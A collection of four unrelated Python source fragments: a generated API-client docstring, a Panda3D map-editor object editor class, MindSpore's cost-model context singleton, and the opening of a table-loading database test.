) -> "ApplyResult[typing.Tuple[InlineResponse2006, int, typing.MutableMapping]]":
"""List all positions of a portfolio. # noqa: E501
List all positions of a portfolio. # noqa: E501
This method makes a asynchronous HTTP request. Returns http data, http status and headers, wrapped in ApplyResult
Args:
id (str): Identifier of the portfolio.
Keyword Args:
attributes ([str]): Limit the attributes returned in the response to the specified set.. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force | |
# Copyright 2020 <NAME>
# SPDX-License-Identifier: Apache-2.0
import typing
from direct.showbase import DirectObject
from panda3d import core
from .. import cameras, dialogs, edit_menu, edit_mode, editor, map_data
from .. import menu as context_menu
from ..editor import highlighter, map_editor, map_objects, operations
from ..editor.descriptors import constants as descriptor_constants
from ..editor.descriptors import sprite_type
from ..editor.highlighting import highlight_details
from ..editor.properties import sprite_properties
from .sector_effects import property_editor
class ObjectEditor:
def __init__(
self,
editor_dialogs: dialogs.Dialogs,
make_clicker_callback,
camera_collection: cameras.Cameras,
edit_mode_selector: edit_mode.EditMode,
menu: edit_menu.EditMenu,
):
self._dialogs = editor_dialogs
self._editor: map_editor.MapEditor = None
self._highlighter: highlighter.Highlighter = None
self._camera_collection = camera_collection
self._edit_mode_selector = edit_mode_selector
self._menu = menu
self._property_editor = property_editor.EditMode(
camera_collection=self._camera_collection,
edit_mode_selector=self._edit_mode_selector,
menu=self._menu,
)
self._copy_sprite: map_objects.EditorSprite = None
make_clicker_callback(
[core.MouseButton.one()],
on_click=self._select_object,
on_double_click=self._edit_object_properties,
)
make_clicker_callback(
[core.KeyboardButton.control(), core.MouseButton.one()],
on_click=self._select_object_append,
)
def setup(
self, editor: map_editor.MapEditor, object_highlighter: highlighter.Highlighter
):
self._editor = editor
self._property_editor.set_editor(self._editor)
self._highlighter = object_highlighter
def setup_commands(
self, event_handler: DirectObject.DirectObject, menu: context_menu.Menu
):
self._menu.add_command(label="Join sectors (j)", command=self._join_sectors)
self._menu.add_command(label="Split (space)", command=self._split_selection)
self._menu.add_command(
label="Extrude (shift+space)", command=self._extrude_selection
)
self._menu.add_command(
label="Delete selected object (delete)", command=self._delete_selected
)
self._menu.add_command(
label="Bind objects together for actions (b)", command=self._bind_objects
)
self._menu.add_command(label="Decrease shade (-)", command=self._decrease_shade)
self._menu.add_command(label="Increase shade (+)", command=self._increase_shade)
self._menu.add_separator()
self._menu.add_command(
label="Change tile (v)", command=self._show_tile_selector
)
self._menu.add_separator()
self._menu.add_command(label="Insert sprite (s)", command=self._add_sprite)
self._menu.add_command(
label="Move sprite to ceiling (home)",
command=self._move_selected_to_ceiling,
)
self._menu.add_command(
label="Move sprite to floor (end)", command=self._move_selected_to_floor
)
self._menu.add_command(
label="Decrease sprite angle (,)", command=self._decrease_angle
)
self._menu.add_command(
label="Decrease sprite angle (.)", command=self._increase_angle
)
self._menu.add_command(
label="Change sprite facing attribute (r)",
command=self._change_sprite_facing_or_set_relative,
)
self._menu.add_command(
label="Toggle sector floor/ceiling relative to first wall (r)",
command=self._change_sprite_facing_or_set_relative,
)
self._menu.add_command(
label="Flip sprite/wall/sector floor/wall (f)", command=self._flip
)
self._menu.add_separator()
self._menu.add_command(
label="Set sector reference wall (1)", command=self._set_sector_first_wall
)
self._menu.add_command(
label="Swap wall texture (2)", command=self._swap_lower_texture
)
self._menu.add_command(
label="Change wall texture pegging (o)", command=self._toggle_wall_peg
)
self._menu.add_command(
label="Decrease sector slope (;)", command=self._decrease_slope
)
self._menu.add_command(
label="Increase sector slope (')", command=self._increase_slope
)
self._menu.add_separator()
self._menu.add_command(
label="Automatically Light Map", command=self._auto_light
)
self._menu.add_command(label="Fix Common Map Errors", command=self._fix_sectors)
event_handler.accept("j", self._join_sectors)
event_handler.accept("space", self._split_selection)
event_handler.accept("shift-space", self._extrude_selection)
event_handler.accept("v", self._change_tile)
event_handler.accept("s", self._add_sprite)
event_handler.accept("delete", self._delete_selected)
event_handler.accept("b", self._bind_objects)
event_handler.accept("n", self._toggle_blocking_state)
event_handler.accept("t", self._toggle_translucent_state)
event_handler.accept("home", self._move_selected_to_ceiling)
event_handler.accept("end", self._move_selected_to_floor)
event_handler.accept("control-page_up", self._move_sector_up)
event_handler.accept("control-page_up-repeat", self._move_sector_up)
event_handler.accept("control-page_down", self._move_sector_down)
event_handler.accept("control-page_down-repeat", self._move_sector_down)
event_handler.accept("page_up", self._move_sector_part_up)
event_handler.accept("page_up-repeat", self._move_sector_part_up)
event_handler.accept("page_down", self._move_sector_part_down)
event_handler.accept("page_down-repeat", self._move_sector_part_down)
event_handler.accept(",", self._decrease_angle)
event_handler.accept(",-repeat", self._decrease_angle)
event_handler.accept(".", self._increase_angle)
event_handler.accept(".-repeat", self._increase_angle)
event_handler.accept("1", self._set_sector_first_wall)
event_handler.accept("2", self._swap_lower_texture)
event_handler.accept(";", self._decrease_slope)
event_handler.accept(";-repeat", self._decrease_slope)
event_handler.accept("'", self._increase_slope)
event_handler.accept("'-repeat", self._increase_slope)
event_handler.accept("r", self._change_sprite_facing_or_set_relative)
event_handler.accept("f", self._flip)
event_handler.accept("o", self._toggle_wall_peg)
event_handler.accept("m", self._toggle_wall_middle)
event_handler.accept("-", self._decrease_shade)
event_handler.accept("--repeat", self._decrease_shade)
event_handler.accept("=", self._increase_shade)
event_handler.accept("=-repeat", self._increase_shade)
self._setup_context_menu(menu)
def set_copy_sprite(self, sprite: map_objects.EditorSprite):
self._copy_sprite = sprite
def _auto_light(self):
operations.auto_light.AutoLight(self._editor.sectors).apply()
def _fix_sectors(self):
details = operations.map_fixer.MapFixer(self._editor.sectors).apply()
self._camera_collection.set_info_text(
f"Removed {details.sectors_removed} sectors, {details.walls_removed} walls. Fixed {details.walls_fixed} walls, {details.sprites_fixed} sprites"
)
def _setup_context_menu(self, menu: context_menu.Menu):
self._setup_wall_context_menu(menu.add_sub_menu("Edit"))
self._setup_sprite_context_menu(menu.add_sub_menu("Add Sprite"))
menu.add_command("Fill out sector behind wall", self._fill_wall_sector)
menu.add_command("Gradient Floor Heights", self._gradient_floor_heights)
def _setup_wall_context_menu(self, menu: context_menu.Menu):
menu.add_command("Extrude", self._extrude_selection)
def _setup_sprite_context_menu(self, menu: context_menu.Menu):
category_menus = {}
for category in descriptor_constants.sprite_category_descriptors.keys():
category_menus[category] = menu.add_sub_menu(category)
for sprite_type, sprite_descriptor in descriptor_constants.sprite_types.items():
category_menus[sprite_descriptor.category].add_command(
sprite_descriptor.name,
self._add_sprite_from_context_menu_callback(
sprite_type, sprite_descriptor
),
)
def _gradient_floor_heights(self):
selected = self._highlighter.select_append(
selected_type_or_types=map_objects.EditorSector
)
operations.gradient_heights.GradientHeights(
[selected_object.map_object for selected_object in selected],
map_objects.EditorSector.FLOOR_PART,
).apply()
def _fill_wall_sector(self):
selected = self._highlighter.select(
selected_type_or_types=map_objects.EditorWall
)
if selected is None:
return
result = operations.sector_fill.SectorFill(
selected.map_object.get_sector(), self._editor.sectors
).fill(selected.map_object)
if result:
self._camera_collection.set_info_text("Filled out sector")
def _edit_object_properties(self):
selected = self._highlighter.select()
if selected is None:
return
if isinstance(selected.map_object, map_objects.sprite.EditorSprite):
self._dialogs.sprite_properties.show(selected.map_object)
elif isinstance(selected.map_object, map_objects.EditorSector):
self._property_editor.set_sector(selected.map_object)
self._edit_mode_selector.push_mode(self._property_editor)
elif isinstance(selected.map_object, map_objects.EditorWall):
self._dialogs.wall_properties.show(selected.map_object)
self._highlighter.update_selected_target_view()
def _select_object(self):
self._highlighter.select()
def _select_object_append(self):
self._highlighter.select_append()
def _decrease_shade(self):
self._increment_shade(-0.01)
def _increase_shade(self):
self._increment_shade(0.01)
def _increment_shade(self, amount):
selected = self._highlighter.select_append(no_append_if_not_selected=True)
original_shades = [
selected_item.map_object.get_shade(selected_item.part)
for selected_item in selected
]
for index, selected_item in enumerate(selected):
shade = original_shades[index]
selected_item.map_object.set_shade(selected_item.part, shade + amount)
if len(selected) > 0:
first_selected = selected[0]
shade = first_selected.map_object.get_shade(first_selected.part)
build_shade = editor.to_build_shade(shade)
self._camera_collection.set_info_text(f"Shade: {build_shade}")
def _change_sprite_facing_or_set_relative(self):
selected = self._highlighter.select_append(
no_append_if_not_selected=True,
selected_type_or_types=[map_objects.EditorSprite, map_objects.EditorSector],
)
for selected_item in selected:
if isinstance(selected_item.map_object, map_objects.EditorSprite):
operations.sprite_facing.SpriteFacing(
selected_item.map_object
).change_facing()
else:
operations.sector_relative_swap.SectorRelativeSwap(
selected_item.map_object, selected_item.part
).toggle()
def _flip(self):
selected = self._highlighter.select_append(no_append_if_not_selected=True)
for selected_item in selected:
operations.flip.Flip(
self._editor.undo_stack, selected_item.map_object, selected_item.part
).flip()
def _bind_objects(self):
selected = self._highlighter.select_append()
if len(selected) < 1:
return
if len(selected) < 2:
selected_object = selected[0]
selected_object.map_object.set_source_event_grouping(None)
selected_object.map_object.set_target_event_grouping(None)
self._highlighter.update_selected_target_view()
self._camera_collection.set_info_text("Removed transmit/receive binding")
return
transmitter = selected[-1]
receivers = selected[:-1]
selected_objects = [item.map_object for item in receivers]
grouping = self._editor.sectors.event_groupings.get_grouping(
transmitter.map_object, selected_objects
)
if grouping is None:
return
transmitter.map_object.set_target_event_grouping(grouping)
for selected_object in receivers:
selected_object.map_object.set_source_event_grouping(grouping)
self._highlighter.update_selected_target_view()
self._camera_collection.set_info_text("Bound objects for transmit/receive")
def _toggle_blocking_state(self):
selected = self._highlighter.select_append(
no_append_if_not_selected=True,
selected_type_or_types=[map_objects.EditorWall, map_objects.EditorSprite],
)
for selected_item in selected:
operations.object_blocking.ObjectBlocking(
selected_item.map_object, selected_item.part
).toggle()
stat = selected_item.map_object.get_stat_for_part(selected_item.part)
self._camera_collection.set_info_text(
f"Blocking: {stat.blocking}, Blocking 2: {stat.blocking2}"
)
def _toggle_translucent_state(self):
selected = self._highlighter.select_append(
no_append_if_not_selected=True,
selected_type_or_types=[map_objects.EditorWall, map_objects.EditorSprite],
)
for selected_item in selected:
operations.object_translucency.ObjectTranslucency(
selected_item.map_object, selected_item.part
).toggle()
stat = selected_item.map_object.get_stat_for_part(selected_item.part)
self._camera_collection.set_info_text(
f"Translucency: {stat.translucent}, Translucency Reverse: {stat.translucent_rev}"
)
def _decrease_slope(self):
self._increment_slope(-0.01)
def _increase_slope(self):
self._increment_slope(0.01)
def _increment_slope(self, amount):
selected = self._highlighter.select_append(
no_append_if_not_selected=True,
selected_type_or_types=map_objects.EditorSector,
)
for selected_item in selected:
operations.increment_sector_heinum.IncrementSectorHeinum(
selected_item.map_object, selected_item.part
).increment(amount)
if len(selected) > 0:
first_selected = selected[0]
heinum = first_selected.map_object.get_heinum(first_selected.part)
build_heinum = editor.to_build_heinum(heinum)
self._camera_collection.set_info_text(f"Heinum: {build_heinum}")
def _set_sector_first_wall(self):
selected = self._highlighter.select(
selected_type_or_types=map_objects.EditorWall
)
if selected is None:
return
selected.map_object.get_sector().set_first_wall(selected.map_object)
def _swap_lower_texture(self):
selected = self._highlighter.select(
selected_type_or_types=map_objects.EditorWall
)
if selected is None:
return
operations.swap_wall_bottom.SwapWallBottom(selected.map_object).toggle()
def _toggle_wall_peg(self):
selected = self._highlighter.select(
selected_type_or_types=map_objects.EditorWall
)
if selected is None:
return
operations.swap_wall_peg.SwapWallPeg(
selected.map_object, selected.part
).toggle()
def _toggle_wall_middle(self):
selected = self._highlighter.select(
selected_type_or_types=map_objects.EditorWall
)
if selected is None:
return
operations.toggle_wall_middle.ToggleWallMiddle(
selected.map_object, selected.part
).toggle()
def _decrease_angle(self):
with self._editor.undo_stack.multi_step_undo("Decrease Angle"):
selected = self._highlighter.select_append(
no_append_if_not_selected=True,
selected_type_or_types=[
map_objects.EditorSector,
map_objects.EditorSprite,
],
)
for selected_item in selected:
if isinstance(selected_item.map_object, map_objects.EditorSprite):
operations.sprite_angle_update.SpriteAngleUpdate(
selected_item.map_object
).increment(-15)
elif isinstance(selected_item.map_object, map_objects.EditorSector):
operations.sector_rotate.SectorRotate(
selected_item.map_object
).rotate(-15)
def _increase_angle(self):
with self._editor.undo_stack.multi_step_undo("Increase Angle"):
selected = self._highlighter.select_append(
no_append_if_not_selected=True,
selected_type_or_types=[
map_objects.EditorSector,
map_objects.EditorSprite,
],
)
for selected_item in selected:
if isinstance(selected_item.map_object, map_objects.EditorSprite):
operations.sprite_angle_update.SpriteAngleUpdate(
selected_item.map_object
).increment(15)
elif isinstance(selected_item.map_object, map_objects.EditorSector):
operations.sector_rotate.SectorRotate(
selected_item.map_object
).rotate(15)
def _delete_selected(self):
selected = self._highlighter.select_append(no_append_if_not_selected=True)
for selected_item in selected:
if selected_item.map_object.is_marker:
continue
if isinstance(selected_item.map_object, map_objects.EditorSprite):
selected_item.map_object.sector.remove_sprite(selected_item.map_object)
elif isinstance(selected_item.map_object, map_objects.EditorWall):
operations.wall_delete.WallDelete(selected_item.map_object).delete()
else:
operations.sector_delete.SectorDelete(
selected_item.map_object, self._editor.sectors
).delete()
def _add_sprite_from_context_menu_callback(
self, sprite_type: int, descriptor: sprite_type.SpriteType
):
def _callback():
with self._editor.undo_stack.multi_step_undo("Add Sprite"):
selected = self._highlighter.select()
if selected is None:
return
blood_sprite = map_data.sprite.Sprite.new()
sprite = selected.map_object.add_sprite(blood_sprite)
sprite_properties.SpriteDialog.apply_sprite_properties(
sprite, descriptor, descriptor.default_tile, descriptor.palette
)
hit_position = self._editor.snapper.snap_to_grid_3d(
selected.hit_position
)
sprite.move_to(hit_position)
return _callback
def _add_sprite(self, sprite_type=None):
with self._editor.undo_stack.multi_step_undo("Add Sprite"):
selected = self._highlighter.select(
selected_type_or_types=[
map_objects.EditorSector,
map_objects.EditorWall,
]
)
if selected is None:
return
sprite = self._add_sprite_to_sector(selected)
if selected.is_floor:
self._move_sprite_to_floor(sprite)
elif selected.is_ceiling:
self._move_sprite_to_ceiling(sprite)
elif selected.is_wall:
offset = selected.map_object.get_normal_3d() * 8
sprite.move_to(sprite.position - offset)
sprite.get_stat_for_part(None).facing = 1
theta = selected.map_object.line_segment.get_direction_theta()
sprite.set_theta(theta + 180)
sprite.invalidate_geometry()
def _add_sprite_to_sector(self, selected: highlight_details.HighlightDetails):
sector = selected.get_sector()
hit_position = self._editor.snapper.snap_to_grid_3d(selected.hit_position)
if self._copy_sprite is None:
return sector.add_new_sprite(hit_position)
else:
blood_sprite = self._copy_sprite.sprite.copy()
sprite = sector.add_sprite(blood_sprite)
sprite.set_source_event_grouping(self._copy_sprite.source_event_grouping)
sprite.move_to(hit_position)
return sprite
def _move_selected_to_floor(self):
for selected_item in self._select_sprites_or_sectors():
if selected_item.is_sprite:
self._move_sprite_to_floor(selected_item.map_object)
else:
operations.sector_move_to_adjacent.SectorMoveToAdjacent(
selected_item.map_object, selected_item.part
).move(False)
def _move_sprite_to_floor(self, sprite: map_objects.EditorSprite):
editor_sector = sprite.get_sector()
new_z = editor_sector.floor_z_at_point(sprite.origin_2d)
sprite.set_z_at_bottom(new_z)
def _move_selected_to_ceiling(self):
for selected_item in self._select_sprites_or_sectors():
if selected_item.is_sprite:
self._move_sprite_to_ceiling(selected_item.map_object)
else:
operations.sector_move_to_adjacent.SectorMoveToAdjacent(
selected_item.map_object, selected_item.part
).move(True)
def _move_sprite_to_ceiling(self, sprite: map_objects.EditorSprite):
editor_sector = sprite.get_sector()
new_z = editor_sector.ceiling_z_at_point(sprite.origin_2d)
sprite.set_z_at_top(new_z)
def _move_sector_up(self):
self._move_sector(-1)
def _move_sector_down(self):
self._move_sector(1)
def _move_sector(self, direction: float):
selected = self._highlighter.select_append()
sectors: typing.Set[map_objects.EditorSector] = set()
for selected_object in selected:
if isinstance(selected_object.map_object, map_objects.EditorSector):
sectors.add(selected_object.map_object)
amount = direction * self._editor.snapper.grid_size
delta = core.Vec3(0, 0, amount)
for sector in sectors:
sector.move_floor_to(sector.floor_z + amount)
sector.move_ceiling_to(sector.ceiling_z + amount)
for marker in sector.floor_z_motion_markers:
marker.move_to(marker.origin + delta)
for marker in sector.ceiling_z_motion_markers:
marker.move_to(marker.origin + delta)
for sprite in sector.sprites:
sprite.move_to(sprite.origin + delta)
def _move_sector_part_up(self):
self._move_sector_part(-1)
def _move_sector_part_down(self):
self._move_sector_part(1)
def _move_sector_part(self, direction: float):
selected = self._highlighter.select_append(
no_append_if_not_selected=True,
selected_type_or_types=map_objects.EditorSector,
)
amount = direction * self._editor.snapper.grid_size
delta = core.Vec3(0, 0, amount)
for selected_object in selected:
sector = selected_object.map_object
if selected_object.part == map_objects.EditorSector.FLOOR_PART:
sector.move_floor_to(sector.floor_z + amount)
for marker in sector.floor_z_motion_markers:
marker.move_to(marker.origin + delta)
else:
sector.move_ceiling_to(sector.ceiling_z + amount)
for marker in sector.ceiling_z_motion_markers:
marker.move_to(marker.origin + delta)
def _change_tile(self):
self._highlighter.select_append(no_append_if_not_selected=True)
self._show_tile_selector()
def _show_tile_selector(self):
if len(self._highlighter.selected) < 1:
return
last_selected = self._highlighter.selected[-1]
picnum = last_selected.map_object.get_picnum(last_selected.part)
self._dialogs.tile_dialog.load_tiles()
self._dialogs.tile_dialog.show(picnum, self._handle_tile_selected)
def _handle_tile_selected(self, picnum: int):
for selected in self._highlighter.selected:
selected.map_object.set_picnum(selected.part, picnum)
def _extrude_selection(self):
selected = self._highlighter.select()
if selected is None:
return
if isinstance(selected.map_object, map_objects.EditorWall):
operations.wall_extrude.WallExtrude(
selected.map_object, self._editor.sectors
).extrude()
elif isinstance(selected.map_object, map_objects.EditorSector):
callback = self._extrude_sector_callback(selected.map_object, selected.part)
self._dialogs.ror_type_selector.show(callback)
self._editor.invalidate_view_clipping()
def _extrude_sector_callback(self, map_object: map_objects.EmptyObject, part: str):
def _callback(extrude_type: str):
extrustion = operations.sector_extrude.SectorExtrude(
map_object, self._editor.sectors, part
)
extrustion.extrude(self._editor.find_unused_sprite_data_1(), extrude_type)
self._editor.invalidate_view_clipping()
return _callback
def _split_selection(self):
selected = self._highlighter.select(
selected_type_or_types=map_objects.EditorWall
)
if selected is None:
return
where = self._editor.snapper.snap_to_grid_2d(selected.hit_position.xy)
operations.wall_split.WallSplit(selected.map_object, where).split()
def _join_sectors(self):
selected = self._highlighter.select_append(
selected_type_or_types=map_objects.EditorSector
)
if len(selected) == 2:
self._do_join(selected[0].map_object, selected[1].map_object)
def _do_join(
self, | |
<gh_stars>1-10
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Context of cost_model in auto_parallel"""
import threading
from mindspore._c_expression import CostModelContext
from mindspore._checkparam import args_type_check
class _CostModelContext:
"""
_CostModelContext is the environment in which operations are executed
Note:
Creating a context through instantiating Context object is not recommended.
Use cost_model_context() to get the context since Context is singleton.
"""
_instance = None
_instance_lock = threading.Lock()
def __init__(self):
self._context_handle = CostModelContext.get_instance()
def __new__(cls):
if cls._instance is None:
cls._instance_lock.acquire()
cls._instance = object.__new__(cls)
cls._instance_lock.release()
return cls._instance
def set_device_memory_capacity(self, dev_mem_cap):
"""
Set device memory capacity.
Args:
dev_mem_cap (float): The memory capacity for each device.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
self._context_handle.set_device_memory_capacity(dev_mem_cap)
def get_device_memory_capacity(self):
"""
Get device memory capacity.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
return self._context_handle.get_device_memory_capacity()
def set_costmodel_alpha(self, alpha):
"""
Set costmodel alpha.
Args:
alpha (float): The parameter costmodel_alpha used in strategy-searching algorithm.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
self._context_handle.set_costmodel_alpha(alpha)
def get_costmodel_alpha(self):
"""
Get costmodel alpha.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
return self._context_handle.get_costmodel_alpha()
def set_costmodel_beta(self, beta):
"""
Set costmodel beta.
Args:
beta (float): The parameter costmodel_beta used in strategy-searching algorithm.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
self._context_handle.set_costmodel_beta(beta)
def get_costmodel_beta(self):
"""
Get costmodel beta.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
return self._context_handle.get_costmodel_beta()
def set_costmodel_gamma(self, gamma):
"""
Set costmodel gamma.
Args:
gamma (float): The parameter costmodel_gamma used in strategy-searching algorithm.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
self._context_handle.set_costmodel_gamma(gamma)
def get_costmodel_gamma(self):
"""
Get costmodel gamma.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
return self._context_handle.get_costmodel_gamma()
def set_costmodel_communi_threshold(self, threshold):
"""
Set costmodel communication threshold.
Args:
threshold (float): A parameter used in adjusting communication calculation for practice.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
self._context_handle.set_costmodel_communi_threshold(threshold)
def get_costmodel_communi_threshold(self):
"""
Get costmodel communication threshold.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
return self._context_handle.get_costmodel_communi_threshold()
def set_costmodel_communi_const(self, communi_const):
"""
Set costmodel communication const.
Args:
const (float): A parameter used in adjusting communication calculation for practice.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
self._context_handle.set_costmodel_communi_const(communi_const)
def get_costmodel_communi_const(self):
"""
Get costmodel communication const.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
return self._context_handle.get_costmodel_communi_const()
def set_costmodel_communi_bias(self, communi_bias):
"""
Set costmodel communication bias.
Args:
bias (float): A parameter used in adjusting communication calculation for practice.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
self._context_handle.set_costmodel_communi_bias(communi_bias)
def get_costmodel_communi_bias(self):
"""
Get costmodel communication bias.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
return self._context_handle.get_costmodel_communi_bias()
def set_multi_subgraphs(self, multi_subgraph):
"""
Set the flag of ANF graph containing multiple subgraphs.
Args:
multi_subgraph (bool): A parameter used in marking the multi-subgraphs flag.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
self._context_handle.set_multi_subgraphs(multi_subgraph)
def get_multi_subgraphs(self):
"""
Get the flag of ANF graph containing multiple subgraphs.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
return self._context_handle.get_multi_subgraphs()
def set_run_phase(self, phase):
"""
Set the flag of running phase: training (0) or inference (1)
Args:
phase (int): A parameter indicating which phase is running.
Raises:
ValueError: If context handle is none, or phase is not in {0, 1}.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
if phase not in (0, 1):
raise ValueError("The argument of set_run_phase() must be '0' or '1', but got {}".format(phase))
self._context_handle.set_run_phase(phase)
def get_run_phase(self):
"""
Get the flag of running phase.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
return self._context_handle.get_run_phase()
def set_dp_algo_single_loop(self, single_loop):
"""
Set the flag of generating a single suite of OperatorInfos in for-loop.
Args:
single_loop (bool): The parameter for the single loop flag.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
self._context_handle.set_dp_algo_single_loop(single_loop)
def get_dp_algo_single_loop(self):
"""
Get the flag of whether or not generating a single suite of OperatorInfos in for-loop.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
return self._context_handle.get_dp_algo_single_loop()
def set_costmodel_allreduce_fusion_algorithm(self, algorithm):
"""
Set costmodel allreduce fusion algorithm.
Args:
algorithm (int): The AllReduce fusion algorithm of parameter gradients.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
self._context_handle.set_costmodel_allreduce_fusion_algorithm(algorithm)
def get_costmodel_allreduce_fusion_algorithm(self):
"""
Get costmodel allreduce fusion algorithm.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
return self._context_handle.get_costmodel_allreduce_fusion_algorithm()
def set_costmodel_allreduce_fusion_times(self, allreduce_fusion_times):
"""
Set costmodel allreduce fusion times.
Args:
allreduce_fusion_times (int): The AllReduce fusion times of parameter gradients.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
self._context_handle.set_costmodel_allreduce_fusion_times(allreduce_fusion_times)
def get_costmodel_allreduce_fusion_times(self):
"""
Get costmodel allreduce fusion times.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
return self._context_handle.get_costmodel_allreduce_fusion_times()
def set_costmodel_allreduce_fusion_tail_percent(self, tail_percent):
"""
Set costmodel allreduce fusion tail percent.
Args:
tail_percent (int): The percentage of backward computing time corresponding to the last parameter gradients
AllReduce in the whole backward computing time.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
self._context_handle.set_costmodel_allreduce_fusion_tail_percent(tail_percent)
def get_costmodel_allreduce_fusion_tail_percent(self):
"""
Get costmodel allreduce fusion tail percent.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
return self._context_handle.get_costmodel_allreduce_fusion_tail_percent()
def set_costmodel_allreduce_fusion_tail_time(self, tail_time):
"""
Set costmodel allreduce fusion tail time.
Args:
tail_time (int): The tail time of the last parameter gradients AllReduce after the end of backward
computation.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
self._context_handle.set_costmodel_allreduce_fusion_tail_time(tail_time)
def get_costmodel_allreduce_fusion_tail_time(self):
"""
Get costmodel allreduce fusion tail time.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
return self._context_handle.get_costmodel_allreduce_fusion_tail_time()
def set_costmodel_allreduce_fusion_allreduce_inherent_time(self, allreduce_inherent_time):
"""
Set costmodel allreduce fusion allreduce inherent time.
Args:
allreduce_inherent_time (int): The inherent cost time of AllReduce.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
self._context_handle.set_costmodel_allreduce_fusion_allreduce_inherent_time(allreduce_inherent_time)
def get_costmodel_allreduce_fusion_allreduce_inherent_time(self):
"""
Get costmodel allreduce fusion allreduce inherent time.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in context!!!")
return self._context_handle.get_costmodel_allreduce_fusion_allreduce_inherent_time()
def set_costmodel_allreduce_fusion_allreduce_bandwidth(self, allreduce_bandwidth):
"""
Set costmodel allreduce fusion allreduce bandwidth.
Args:
allreduce_bandwidth (int): The bandwidth of AllReduce.
Raises:
ValueError: If context handle is none.
"""
if self._context_handle is None:
raise ValueError("Context handle is none in | |
<gh_stars>1000+
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright 2021 4Paradigm
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -*- coding: utf-8 -*-
from testcasebase import TestCaseBase
import time
import threading
from libs.test_loader import load
from libs.deco import multi_dimension
import libs.utils as utils
from libs.logger import infoLogger
class TestLoadTable(TestCaseBase):
def test_loadtable_newleader_success_can_put(self):
"""
拷贝db目录后loadtable,功能正常
新节点是主节点,loadtable后可以put数据
:return:
"""
rs1 = self.create(self.leader, 't', self.tid, self.pid)
self.assertIn('Create table ok', rs1)
for i in range(0, 6):
self.put(self.leader,
self.tid,
self.pid,
'testkey',
self.now() - i,
'testvalue')
rs2 = self.makesnapshot(self.leader, self.tid, self.pid)
self.assertIn('MakeSnapshot ok', rs2)
# 将table目录拷贝到新节点
self.cp_db(self.leaderpath, self.slave1path, self.tid, self.pid)
# 新主节点loadtable后可以put数据
rs3 = self.loadtable(self.slave1, 't', self.tid, self.pid, 144000, 8, 'true')
self.assertIn('LoadTable ok', rs3)
